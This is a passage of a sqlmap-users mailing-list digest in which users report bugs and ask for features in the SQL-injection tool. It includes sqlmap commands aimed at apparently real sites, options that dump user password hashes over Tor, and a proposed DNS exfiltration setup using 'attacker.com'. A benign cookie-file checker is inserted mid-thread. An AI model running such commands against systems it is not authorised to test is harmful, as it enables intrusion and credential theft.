> > > > Hi folks,
> > > >
> > > > .... that doesn't work for me. It always uses the cookie supplied
> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > > from the 1st server reply is being used)
> > > >
> > > > So what is wrong in here:
> > > >
> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > > --level=2 --risk=2 -r $REQUEST
> > > >
> > > > The content of the file $REQUEST is:
> > > >
> > > > POST <URL> HTTP/1.1
> > > > Host: <HOST>
> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > > Accept-Language: en-US,en;q=0.5
> > > > Accept-Encoding: gzip, deflate
> > > > Referer: <Referer>
> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > > Connection: keep-alive
> > > > Content-Type: application/x-www-form-urlencoded
> > > > Content-Length: 67
> > > >
> > > > <abunchofpostparams>
> > > >
> > > >
> > > > No hints that cookie-file is not in correct format (I've been through this,
> > > > at least I think so ;) ).
> > > >
> > > > Any insight would be much appreciated.
> > > >
> > > >
> > > > Cheers,
> > > >
> > > > Dirk
> > > >
> > > >
> > > > ------------------------------------------------------------------------------
> > > > Precog is a next-generation analytics platform capable of advanced
> > > > analytics on semi-structured data. The platform includes APIs for building
> > > > apps and a phenomenal toolset for data science.
Developers can use > > > > our toolset for easy data analysis & visualization. Get a free account! > > > > http://www2.precog.com/precogplatform/slashdotnewsletter > > > > _______________________________________________ > > > > sqlmap-users mailing list > > > > sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>> > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > > > > > > > > > > > -- > > > > Miroslav Stampar > > > > http://about.me/stamparm > > > > > > > > > > > > > > > -- > > > Miroslav Stampar > > > http://about.me/stamparm > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > > -- > Miroslav Stampar > http://about.me/stamparm ------------------------------ Message: 6 Date: Mon, 15 Apr 2013 14:01:01 -0700 From: <co...@5i...> Subject: [sqlmap-users] --host parameter To: sql...@li... Message-ID: <201...@em...> Content-Type: text/plain; charset="utf-8" Hello, the --host doesn't work as expected, or I am doing something wrong: this works as expected: ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:57:15 [23:57:15] [INFO] testing connection to the target URL [23:57:15] [INFO] heuristics detected web page charset 'ascii' [23:57:15] [INFO] testing if the target URL is stable. This can take a couple of seconds [23:57:16] [INFO] target URL is stable [23:57:16] [INFO] testing if GET parameter 'id' is dynamic [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic [23:57:16] [INFO] GET parameter 'id' is dynamic [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' .... this doesn't work as expected: ./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0' sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:58:03 [23:58:03] [INFO] testing connection to the target URL [23:58:03] [CRITICAL] page not found (404) it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] [23:58:05] [WARNING] HTTP error codes detected during run: ............ Of course i.csland.ro resolves to 188.240.236.15. Any idea? Thanks. ------------------------------ Message: 7 Date: Tue, 16 Apr 2013 09:12:05 +1100 From: ???????? ?????? <vo...@s2...> Subject: [sqlmap-users] Sqlmap and direct connect error To: sql...@li... Message-ID: <C59...@s2...> Content-Type: text/plain; charset=us-ascii Hi! This bug detected if add direct param. 
python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev-de99717 Python version: 2.7.3 Operating system: posix Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs Technique: None Back-end DBMS: MySQL (identified) Traceback (most recent call last): File "sqlmap.py", line 87, in main start() File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start action() File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action setHandler() File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler conf.dbmsConnector.connect() File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect return Connection(*args, **kwargs) File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__ self._connect() File 
"/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect sock.connect((self.host, self.port)) File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect raise GeneralProxyError((5, _generalerrors[5])) GeneralProxyError: (5, 'bad input') ------------------------------ Message: 8 Date: Tue, 16 Apr 2013 14:19:18 +0200 From: Miroslav Stampar <mir...@gm...> Subject: Re: [sqlmap-users] --host parameter To: co...@5i... Cc: SqlMap List <sql...@li...> Message-ID: <CA+...@ma...> Content-Type: text/plain; charset="iso-8859-1" Hi. Thank you for your report and find it fixed with the latest commit [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86 On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote: > Hello, > the --host doesn't work as expected, or I am doing something wrong: > > > this works as expected: > > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > takeover tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility to > obey all applicable local, state and federal laws. Developers assume no > liability and are not responsible for any misuse or damage caused by > this program > > [*] starting at 23:57:15 > > [23:57:15] [INFO] testing connection to the target URL > [23:57:15] [INFO] heuristics detected web page charset 'ascii' > [23:57:15] [INFO] testing if the target URL is stable. 
This can take a > couple of seconds > [23:57:16] [INFO] target URL is stable > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic > [23:57:16] [INFO] GET parameter 'id' is dynamic > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' > might be injectable (possible DBMS: 'MySQL') > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' > > > .... > > > this doesn't work as expected: > > ./sqlmap.py --host='i.csland.ro' > --url='http://188.240.236.15/index.php?id=0' > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > takeover tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility to > obey all applicable local, state and federal laws. Developers assume no > liability and are not responsible for any misuse or damage caused by > this program > > [*] starting at 23:58:03 > > [23:58:03] [INFO] testing connection to the target URL > [23:58:03] [CRITICAL] page not found (404) > it is not recommended to continue in this kind of cases. Do you want to > quit and make sure that everything is set up properly? [Y/n] > [23:58:05] [WARNING] HTTP error codes detected during run: > > ............ > > > Of course i.csland.ro resolves to 188.240.236.15. Any idea? > > Thanks. > > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... 
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm -------------- next part -------------- An HTML attachment was scrubbed... ------------------------------ Message: 9 Date: Tue, 16 Apr 2013 14:33:33 +0200 From: Miroslav Stampar <mir...@gm...> Subject: Re: [sqlmap-users] Sqlmap and direct connect error To: ???????? ?????? <vo...@s2...> Cc: SqlMap List <sql...@li...> Message-ID: <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...> Content-Type: text/plain; charset="koi8-r" Hi Vladimir. Find it "patched" with the latest commit [1]. Basically, those combinations should not be allowed (-d and --url; -d and --tor; etc.) and now we've added new option validation checks for this kind of cases. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote: > Hi! > > This bug detected if add direct param. > > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > --exclude-sysdbs > > > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry > your run with the latest development version from the GitHub repository. If > the exception persists, please send by e-mail to ' > sql...@li...' or open a new issue at ' > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. The developers will > try to reproduce the bug, fix it accordingly and get back to you. 
> sqlmap version: 1.0-dev-de99717 > Python version: 2.7.3 > Operating system: posix > Command line: sqlmap.py -d > **************************************************** -u > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > --exclude-sysdbs > Technique: None > Back-end DBMS: MySQL (identified) > Traceback (most recent call last): > File "sqlmap.py", line 87, in main > start() > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in > start > action() > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action > setHandler() > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in > setHandler > conf.dbmsConnector.connect() > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in > connect > self.connector = pymysql.connect(host=self.hostname, user=self.user, > passwd=self.password, db=self.db, port=self.port, > connect_timeout=conf.timeout, use_unicode=True) > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", > line 93, in Connect > return Connection(*args, **kwargs) > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > line 584, in __init__ > self._connect() > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > line 739, in _connect > sock.connect((self.host, self.port)) > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in > connect > raise GeneralProxyError((5, _generalerrors[5])) > GeneralProxyError: (5, 'bad input') > > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. 
Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm -------------- next part -------------- An HTML attachment was scrubbed... ------------------------------ Message: 10 Date: Tue, 16 Apr 2013 23:26:39 +0200 From: buawig <bu...@gm...> Subject: [sqlmap-users] feature request: offline mode for --dns-domain? To: SqlMap List <sql...@li...> Message-ID: <516...@gm...> Content-Type: text/plain; charset=UTF-8 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, in cases where sqlmap is run against targets on internal networks it would be great if one could tell sqlmap to simply proceed without expecting incoming DNS requests, because sqlmap can not be executed directly on the DNS server (which can't reach the target, but the target can reach the DNS server). For me it would be enough to simply run something like - -u ... --dns-domain=attacker.com --dns-port=0 (--dns-port does not exist [yet]) to let sqlmap know that it doesn't need to start a DNS listener. I would then collect and decode the DNS querries on the DNS server manually, but I could also envision running a second sqlmap instance on the DNS server with --dns-domain (but without -u) doing that job. 
------------------------------ Message: 11 Date: Tue, 16 Apr 2013 23:24:23 +0200 From: buawig <bu...@gm...> Subject: [sqlmap-users] feature request: --dns-domain for non-root users (--dns-port) To: sql...@li... Message-ID: <516...@gm...> Content-Type: text/plain; charset=UTF-8 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, I just wanted to request a "extension" for a previous feature request (DNS exfiltration [1]) but after looking at my former feature request I realized that it included already the feature I was about to request: - --dns-domain for non-root users: - --dns-port The use-case is mentioned in the former feature request: [1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100 [truncated message content] |
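Added example (not sqlmap's code and not written by anyone in the thread): a small checker for the Netscape cookie-file lines discussed in the quoted --load-cookies messages above. It flags the flag/leading-dot mismatch behind the `assert domain_specified == initial_dot` traceback and the expiry-0 session cookies; the hosts and cookie values in the sample are constructed placeholders, and the finding codes and function names are chosen for this example.

```python
import time

# Constructed sample modelled on the cookie-file lines quoted in the thread.
# Hosts and cookie values are placeholders, not data from the page.
SAMPLE = (
    "# Netscape HTTP Cookie File\n"
    "app.example.test\tFALSE\t/\tTRUE\t0\tJSESSIONID\tAAAA1111\n"
    "app.example.test\tTRUE\t/\tTRUE\t9999999999\tJSESSIONID\tBBBB2222\n"
    ".example.test\tTRUE\t/\tFALSE\t1429089794\tPREF\tx=1\n"
    ".example.test\tTRUE\t/\tFALSE\t0\t_HOP\t\n"
    "app.example.test FALSE / TRUE 0 JSESSIONID CCCC3333\n"
)

FIELD_NAMES = ("domain", "domain_specified", "path", "secure",
               "expires", "name", "value")


def lint_cookie_file(text, now=None):
    """Return (line_number, code, detail) findings for a cookie file.

    The codes are names chosen for this example:
      fields       not exactly seven tab-separated fields
      bad-flag     a TRUE/FALSE column holds something else
      domain-flag  domain_specified disagrees with the leading dot
      session      expiry is 0 or empty (session cookie)
      bad-expiry   expiry is not an integer
      expired      expiry is a UNIX time at or before `now`
    """
    now = time.time() if now is None else now
    findings = []
    for lineno, raw in enumerate(text.split("\n"), start=1):
        line = raw.rstrip("\r")
        stripped = line.strip()
        # The header, comments and blank lines carry no cookie.
        if not stripped or stripped.startswith("#"):
            continue

        # Split on tabs only and keep a trailing tab: the value may be empty.
        fields = line.split("\t")
        if len(fields) != len(FIELD_NAMES):
            findings.append((lineno, "fields",
                             "expected 7 tab-separated fields, got %d"
                             % len(fields)))
            continue
        cookie = dict(zip(FIELD_NAMES, fields))

        for column in ("domain_specified", "secure"):
            if cookie[column] not in ("TRUE", "FALSE"):
                findings.append((lineno, "bad-flag",
                                 "%s is %r" % (column, cookie[column])))

        # Same condition as the `assert domain_specified == initial_dot`
        # line in the traceback quoted in the thread.
        specified = cookie["domain_specified"] == "TRUE"
        initial_dot = cookie["domain"].startswith(".")
        if specified != initial_dot:
            findings.append((lineno, "domain-flag",
                             "flag %s but domain %r %s a leading dot"
                             % (cookie["domain_specified"], cookie["domain"],
                                "has" if initial_dot else "lacks")))

        expires = cookie["expires"]
        if expires in ("", "0"):
            # Written like this by wget --keep-session-cookies; a loader that
            # compares the field with the current time reports it as expired.
            findings.append((lineno, "session",
                             "session cookie, no usable expiry time"))
            continue
        try:
            when = int(expires)
        except ValueError:
            findings.append((lineno, "bad-expiry",
                             "expiry %r is not an integer" % expires))
            continue
        if when <= now:
            findings.append((lineno, "expired",
                             "expired %d seconds before the check"
                             % int(now - when)))
    return findings


def codes(text, now=None):
    """Findings reduced to (line_number, code) pairs."""
    return [(lineno, code) for lineno, code, _ in lint_cookie_file(text, now)]


if __name__ == "__main__":
    for lineno, code, detail in lint_cookie_file(SAMPLE):
        print("line %d: %-11s %s" % (lineno, code, detail))
```

Running such a check on a cookie file before handing it to a tool separates format problems (spaces instead of tabs, flag and domain disagreeing) from lifetime problems (session or expired cookies), which the thread shows are easy to confuse.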
From: Miroslav S. <mir...@gm...> - 2013-05-30 19:00:48
|
Hi. Have you been able to retrieve user names normally? I mean, were they normally been displayed in console output? Also, is boolean technique the only one detected by sqlmap in your case (or maybe UNION)? Kind regards, Miroslav Stampar On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote: > Hi friend, > > > Could you help me with this bug ? > > > [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your > run with the latest development version from the GitHub repository. If the > exception persists, please send by e-mail to ' > sql...@li...' or open a new issue at ' > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. The developers will > try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev > Python version: 2.7.3 > Operating system: posix > Command line: ./sqlmap -u *********************************************** > --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP > -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft > SQL Server --users --passwords > Technique: BOOLEAN > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "./sqlmap", line 87, in main > start() > File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start > action() > File 
"/usr/share/sqlmap/lib/controller/action.py", line 81, in action > conf.dbmsHandler.getPasswordHashes(), "password hash", > CONTENT_TYPE.PASSWORDS) > File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in > getPasswordHashes > if user in retrievedUsers: > TypeError: unhashable type: 'list' > > [*] shutting down at 22:54:12 > Thanks > > BOB > > > > > ------------------ Original ------------------ > *From: * "sqlmap-users-request"<sql...@li... > >; > *Date: * May 29, 2013 > *To: * "sqlmap-users"<sql...@li...>; > *Subject: * sqlmap-users Digest, Vol 31, Issue 1 > > Send sqlmap-users mailing list submissions to > sql...@li... > > To subscribe or unsubscribe via the World Wide Web, visit > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > or, via email, send a message with subject or body 'help' to > sql...@li... > > You can reach the person managing the list at > sql...@li... > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of sqlmap-users digest..." > > > Today's Topics: > > 1. Re: Feature request (David Guimaraes) > 2. Re: --load-cookies (Dirk Wetter) > 3. Re: --load-cookies (Miroslav Stampar) > 4. Re: Patch for /task/<task_id>/delete in clean_filesystem > (Miroslav Stampar) > 5. Re: --load-cookies (Dirk Wetter) > 6. --host parameter (co...@5i...) > 7. Sqlmap and direct connect error (???????? ??????) > 8. Re: --host parameter (Miroslav Stampar) > 9. Re: Sqlmap and direct connect error (Miroslav Stampar) > 10. feature request: offline mode for --dns-domain? (buawig) > 11. feature request: --dns-domain for non-root users (--dns-port) > (buawig) > 12. Domain credentials (Brian Milliron) > 13. Re: Domain credentials (Brandon Perry) > 14. Re: feature request: offline mode for --dns-domain? > (Miroslav Stampar) > 15. Re: Domain credentials (Miroslav Stampar) > 16. Re: feature request: fetch DNS queries from DNS server via > HTTP (buawig) > 17. 
Re: feature request: fetch DNS queries from DNS server via > HTTP (Miroslav Stampar) > 18. MySQL error based technique bug (Konrads Smelkovs) > 19. Re: MySQL error based technique bug (Miroslav Stampar) > 20. SQLmap crashing (Phillip Wylie) > 21. Re: SQLmap crashing (Miroslav Stampar) > 22. Custom injection payload in POST (Marcell Fodor) > 23. Re: SQLmap crashing (Miroslav Stampar) > 24. I got error on windows (warezhacking) > 25. Appending to a dump (Stephen Shkardoon) > 26. Re: Appending to a dump (Miroslav Stampar) > 27. Re: Appending to a dump (Stephen Shkardoon) > 28. Re: Appending to a dump (Miroslav Stampar) > 29. --ignore-404 ? (buawig) > 30. PostgreSQL: substr('string', 1, 1) vs. substring('string' > from 1 for 1) (buawig) > 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' > from 1 for 1) (Miroslav Stampar) > 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' > from 1 for 1) (Miroslav Stampar) > 33. Re: --ignore-404 ? (Miroslav Stampar) > 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras) > 35. Re: BUG...!!!! o.O (Miroslav Stampar) > 36. gun...@gm... wants to follow you. Accept? > (gun...@gm...) > 37. Direct access to mysql database (Marcell Fodor) > 38. Re: Direct access to mysql database (Miroslav Stampar) > 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... > (Badoo) > 40. Not getting any sensitive data from database (Marcell Fodor) > 41. Re: Not getting any sensitive data from database > (Miroslav Stampar) > 42. unhandled exception (kvasilopoulos) > 43. [SQLMAP] Unhandled exception for IPv6 > (e.n...@st...) > 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) > 45. Re: unhandled exception (Miroslav Stampar) > 46. Passing SOAPAction in --header (Brandon Perry) > 47. Re: Passing SOAPAction in --header (Miroslav Stampar) > 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) > 49. Blind SQL Injection question (Guy Dufour) > 50. Re: Blind SQL Injection question (Chris Oakley) > 51. 
Re: Passing SOAPAction in --header (Brandon Perry) > 52. Re: Passing SOAPAction in --header (Brandon Perry) > 53. Deploy&Create SSH/tunnel with compromised MSSQL server > (Alok Kumar) > 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server > (Brandon Perry) > 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server > (Alok Kumar) > 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server > (Brandon Perry) > 57. SQLMAP Bug (Joe O'Hara) > 58. Re: SQLMAP Bug (Miroslav Stampar) > 59. [CRITICAL] (Thai Thao) > 60. Re: [CRITICAL] (Miroslav Stampar) > 61. Providing multiple dbms (Sebastian Nerz) > 62. Re: Providing multiple dbms (Miroslav Stampar) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Sat, 13 Apr 2013 21:40:39 -0300 > From: David Guimaraes <sk...@gm...> > Subject: Re: [sqlmap-users] Feature request > To: Miroslav Stampar <mir...@gm...> > Cc: SqlMap List <sql...@li...> > Message-ID: > <CAJ...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Good question Miroslav.. I tried to think in something that can be > implemented without ruin sqlmap query schema, but I could not come to any > conclusion... =( > > The thing is, sqlsus use a different approch to dump the data, making this > kind of thing possible... > > The solution that I found in this particular scenario is to use sqlsus, > unfortunately... > > Regards. > > David > > > On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar < > mir...@gm... > > wrote: > > > Hi David. > > > > And what do you recommend to be done in case of query with length > > > max_inj_length? > > > > Kind regards, > > Miroslav Stampar > > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote: > > > >> Hi, I am trying to perform sql injection on a web site but I can not get > >> successful due to a size limitation on the query sent to the server. 
The > >> server is limiting the size of query in 512 bytes only and sqlmap do not > >> have any customization that allows me to bypass this restriction like > >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called > "autoconf" > >> that measure the permited query size. > >> > >> There is some chance to put this kind of feature in sqlmap? > >> > >> Thanks. > >> > >> -- > >> David Gomes Guimar?es > >> > >> > >> > ------------------------------------------------------------------------------ > >> Own the Future-Intel® Level Up Game Demo Contest 2013 > >> Rise to greatness in Intel's independent game demo contest. > >> Compete for recognition, cash, and the chance to get your game > >> on Steam. $5K grand prize plus 10 genre and skill prizes. > >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > >> > > > -- > David Gomes Guimar?es > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 2 > Date: Mon, 15 Apr 2013 11:36:37 +0200 > From: Dirk Wetter <sp...@dr...> > Subject: Re: [sqlmap-users] --load-cookies > To: Miroslav Stampar <mir...@gm...> > Cc: SqlMap List <sql...@li...> > Message-ID: <516...@dr...> > Content-Type: text/plain; charset=ISO-8859-1 > > > > On 04/14/2013 01:14 AM, Miroslav Stampar wrote: > > Nevertheless, with the latest commit that check should be "neutralized" > now. Could you please retry it now? > > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib > hiccups, using the same file: > > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug! 
> Traceback (most recent call last): > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in > _really_load > assert domain_specified == initial_dot > AssertionError > > _warn_unhandled_exception() > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': > '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') > > the 999.. looks strange to me. > > > > > > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar < > mir...@gm... <mailto:mir...@gm...>> wrote: > > > > Hi Dirk. > > > > Well, I would say that you have an expired cookie. Do you see that > value 0? That value should be a valid UNIX time representing time of cookie > expiration. Also, I've just tested that cookie of yours and sqlmap says: > "[WARNING] cookie '....' has expired" > > > > that's true but IMO 0 represents just a session cookie. Example: > > prompt% wget -q -O /dev/null --keep-session-cookies > --save-cookies=/dev/stdout bing.com > # HTTP cookie file. > # Generated by Wget on 2013-04-15 11:23:13. > # Edit at your own risk. > > .bing.com TRUE / FALSE 1429089794 SRCHUSR > AUTOREDIR=0&GEOVAR=&DOB=20130415 > .bing.com TRUE / FALSE 1429089794 SRCHD > D=2781203&MS=2781203&AF=NOFORM > .bing.com TRUE / FALSE 1429089794 OrigMUID > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe > .bing.com TRUE / FALSE 1429089794 MUID > 333995A69E06630B2EB491169F016314 > .bing.com TRUE / FALSE 0 _SS > SID=B954CB7EDF8643CABAD8013F27A241E7 > .bing.com TRUE / FALSE 0 _HOP > .bing.com TRUE / FALSE 0 _FS NU=1 > .bing.com TRUE / FALSE 1429089794 _FP EM=1 > www.bing.com FALSE / FALSE 1429089794 SRCHUID > V=2&GUID=975091780DFF407DA9DD07139FD97C4D > www.bing.com FALSE / FALSE 1429089794 MUIDB > 333995A69E06630B2EB491169F016314 > > prompt% > > Same parser problem btw if I edit the cookie file and put 1429089794 unix > time instead of 0 in there. 
> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
> > Kind regards,
> > Miroslav Stampar
> >
> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
> >
> > Hi Miroslav,
> >
> > thx for your prompt answer.
> >
> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > > Hi Dirk.
> > >
> > > Could you please get the latest revision and retry it again?
> >
> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
> > The slight difference seems to be that in the case where I didn't supply a cookie
> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
> >
> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
> > >
> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
> >
> > sure, here you go:
> >
> > --snip
> > # Netscape HTTP Cookie File
